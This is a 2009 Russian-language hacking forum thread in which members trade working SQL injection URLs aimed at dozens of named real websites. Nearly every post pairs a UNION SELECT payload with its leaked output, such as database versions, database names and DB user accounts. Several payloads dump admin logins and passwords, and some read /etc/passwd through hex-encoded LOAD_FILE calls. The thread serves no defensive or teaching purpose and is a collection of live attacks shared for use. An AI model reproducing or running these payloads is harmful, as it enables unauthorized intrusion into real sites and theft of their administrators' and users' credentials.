SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    PR 5
    Code:
    http://em.tsu.[COLOR=White][SIZE=4]edu[/SIZE][/COLOR]/calendar/index.php?display=event&id=-579+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    5.0.45-community:calendar:p[email protected]

    Code:
    http://em.tsu.edu/calendar/index.php?display=event&id=-579+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
     
  2. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    не помню кидали или нет, антибоян не работает

    u_sittrans@localhost
    5.0.44
    sittrans
     
    1 person likes this.
  3. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    HTML:
    http://www.faberlic-msk.ru/index.php?act=fbcatalog&s=into&id=-1+union+select+1,2,3,concat_ws(char(58),version(),database(),user())--
    5.1.29
    liona@localhost
     
  4. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.insightrussia.org/menu.php?id=-7'+UnIoN+SeLecT+1,database(),3,4,5,version()+--+
    insight::4.1.22-lk-log

    Code:
    http://synclub.ru/menu.php?t=text&id=-22+UnIoN+SeLecT+username+from+user+--+
    admin

    Code:
    http://jerusalemstonenyc.com/states.php?id=-23+union+select+1,version(),3,4+--+
    4.1.22-standard

    Code:
    http://www.haircommercial.co.uk/auction/home.php?a=-203+union+select+1,2,3,4,5,concat_ws(0x3a3a,user_name,user_password),7+from+users+--+&f=0
    Code:
    http://rockpubs.planetrock.co.uk/details.php?pub_id=-52'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a3a,id,admin_id,password)+from+rockpub_admin+/*+
    PS антибоян не пашет((, извеняюсь если будут баяны(
     
    1 person likes this.
  5. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Уральская телефонная компания

    PR: 4
    http://home.utk.ru/news.php?id=-100065+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11
     
    1 person likes this.
  6. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.foroporlamemoria.es/pl.php?id=-68+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16/*
    5.0.32-Debian_7etch10-log:[email protected]:foroporlamemoria_es

    http://www.fashionmod.ru/pl.php?id=-52+union+select+1,2,concat_ws(0x2a,version(),user(),database())
    5.1.32-community-log*[email protected]*Dkfmxjh_fashion

    http://www.wspinanie.pl/biznes/product.pl.php?id=-11+union+selecT+1,2,3,4,5,6,7,8,9,10,concat_Ws(0x3a,version(),user(),database()),12
    5.0.51a-24+lenny1:wspinanie@localhost:wspinanie_1

    http://www.wspinanie.pl/biznes/product.pl.php?id=-11+union+selecT+1,2,3,4,5,6,7,8,9,10,LOAD_FILE(0x2f6574632f706173737764),12+from+mysql.user

    http://www.wspinanie.pl/biznes/product.pl.php?id=-11+union+selecT+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user,password),12+from+mysql.user

    http://www.turul.ro/forum/tt.php?id=-3+union+select+unhex(hex(version())),2,3/*

    http://www.psyvlad.ru/pc/pp.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3
    5.0.51a-community:psyvlad@localhost:db_psyvlad

    http://www.polymedix.com/pr.php?id=-42+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10
    5.0.67-msl-icd1-log:polymcms@localhost:polymedi_sys

    http://www.ddjgraphics.com/pr.php?id=-4+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4
    5.0.45:root@localhost:ddj

    http://www.ddjgraphics.com/pr.php?id=-4+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4

    http://www.clearbluebrandsolutions.com/pr.php?id=-15+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6
    4.0.27-MAX-LOG:[email protected]:CLEARBLUE
     
    #9946 AlexSatter, 25 Jun 2009
    Last edited by a moderator: 25 Jun 2009
  7. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    Code:
    http://www.elonat.com/buy_a_business_info.php?id=-59+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin--
    Database Version: 5.0.82-community
    Database name: web29-elonat
    User name: web29-elonat@localhost

    jokester: посмотри на правила темы, они изменились , логины , пароли, хеши и админки запрещены
     
    #9947 Skofield, 25 Jun 2009
    Last edited by a moderator: 25 Jun 2009
  8. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    HTML:
    http://www.vip-zalevsky.com/index.php?pageid=-2+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16--
    4.1.22-standart-log
     
  9. rolex

    rolex Member

    Joined:
    7 Apr 2009
    Messages:
    27
    Likes Received:
    35
    Reputations:
    4
    cvetnik_cvetnik:4.1.22-standard-log:cvetnik_cvetnik@localhost
    И того же разработчика:
    И vip-zalevsky.com от Bramin тож из той серии =)
     
    2 people like this.
  10. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.ashokshakya.com.np./sahitya/geetfull.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9--

    ashok_root@localhost:4.1.22-standard:ashok_drishtikon

    #########################################

    http://www.gundemturkiye.org/detail.php?subject=&news=&date=1&dateop==&day1=1&month1=1&year1=1994&day2=1&month2=1&year2=1990&np=&&id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8--

    gundemturkiye@localhost:5.0.32-Debian_7etch6-log:www_gundemturkiye_org

    $########################################
    http://www.imhotep-org.eu/include/edi.php?id=1&np=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4--

    4.0.27-max-
    log:[email protected]:db164644938

    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
    http://lame.ws/rit/quote.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4--

    5.0.24a-log:root@localhost:quotes

    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
    что то про футбол как я понял

    http://swissscore.com/ws/seite.php?id=1'+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8/*

    web365@localhost:usr_web365_2:4.1.22-standard

    %%%%%%%%%%%%%%%%%%%%%%%%%%%
    http://urola.pre.wegetit.ws/servicios-detalle.php?id=1+and+substring(version(),1,1)=5--

    #####################################
    http://www.contax.ws/inicio.php?id=1&s=4+and+substring(version(),1,1)=5--
     
    _________________________
    #9950 HAXTA4OK, 25 Jun 2009
    Last edited: 26 Jun 2009
    2 people like this.
  11. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    Code:
    http://www.hrgrp.com/releases/pr.php?id=-19+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11
    4.0.27-log:[email protected]:hrgrp

    Code:
    http://www.emag.ru/pr.php?pr=-10+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10
    5.0.45:emag@localhost:emag

    Code:
    http://asu.iate.obninsk.ru/pr.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database())
    5.0.45:asu@localhost:asudb

    Code:
    http://www.artsawa.com/site/pr.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7
    5.0.41-community-log:[email protected]:abouder_asawa
     
  12. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    Code:
    http://www.drummusic.tv/product.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,USERNAME,PASSWORD,EMAIL),10,11,12,13,14,15+from+USERS/*
    Database Version: 5.0.45-community
    Database name: digivendor
    User name: dmtv_public@localhost
     
  13. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Code:
    http://www.ce-sa.org/prod.php?id=6%27+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10/*
    version():4.1.21-standard-log
    database():cesaorg_cesa
    user():cesaorg@localhost
     
  14. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    Code:
    http://citynsk.tv/index.php?page=progr&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4--
    Database Version: 4.1.22-log
    Database name: adeptor1_vizit
    User name: adeptor1_vizit@localhost
     
  15. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.beatgoeson.se/help.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2--

    4.0.17-standard:f1000686:f1000686@localhost

    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
    http://www.heleneschmitz.se/php/loadmeny.php?id=1+and+substring(version(),1,1)=4--
     
    _________________________
    #9955 HAXTA4OK, 27 Jun 2009
    Last edited: 27 Jun 2009
  16. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    Code:
    http://www.telephototech.ru/news_podr.php?nid=-187+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10/*
    5.0.26-log:telephotot@localhost:telephotot

    Code:
    http://www.sputnik-altai.ru/hot.php?id=52+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database())
    5.0.77:sputnik@localhost:sputnik

    Code:
    http://www.roma-mia.de/stadtspaziergang-rom.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7
    4.1.22-standard-log:db242003_2@local2:db242003_2
     
    1 person likes this.
  17. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://arcadeboomer.com/index.php?loadpage=./includes/articleblock.php&articlecat=-2+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+--+
    Code:
    http://diveinredsea.ru/news.php?p=-11'+union+select+1,pass,3,4+from+admin+/*+

    Code:
    http://israelecotours.com/news.php?p=-4'+union+select+1,2,pass,4,login,6,7+from+admin+/*+&u=1
    Code:
    http://www.fysiovanlith.nl/index.php?pid=-36+union+select+1,2,3,4,database(),6,7,8,9,10,11,12+/*+&hid=1
    mey_cms

    Code:
    http://www.4x4site.nl/nieuwsitem.php?artid=-350+union+select+1,2,3,version(),5,6,7,8+/*+&titel=Range%20Rover%20convertible
    4.1.21-standard-log

    Code:
    http://www.spamash.by/menu.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9+/*+
    5.0.45-Debian_1-log

    Code:
    http://www.cycling.by/news.php?form_id=-900+union+select+1,login,3,4,password,6,7+from+cms_system_users+/*+
     
    1 person likes this.
  18. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.topp6.se/index.php?do=showrate&id=-1'+union+select+concat_ws(0x3a,version(),user(),database()),2+--+

    5.0.51a:[email protected]:topp6
     
    _________________________
  19. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    http://eho-dv.com/news.details.php?id=-13168+Union+select+1,2,3,version(),5,6,7,8,9,10,11,12+
    5.0.77-community
     
    #9959 Krist_ALL, 27 Jun 2009
    Last edited by a moderator: 27 Jun 2009
  20. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    Code:
    http://ethicaltraveler.net/news_story.php?id=-181+union+select+1,version(),3,4/*
    Database Version: 4.1.22-standard
    Database name: imalawi_main
    User name: imalawi_main%40localhost
     
Thread Status:
Not open for further replies.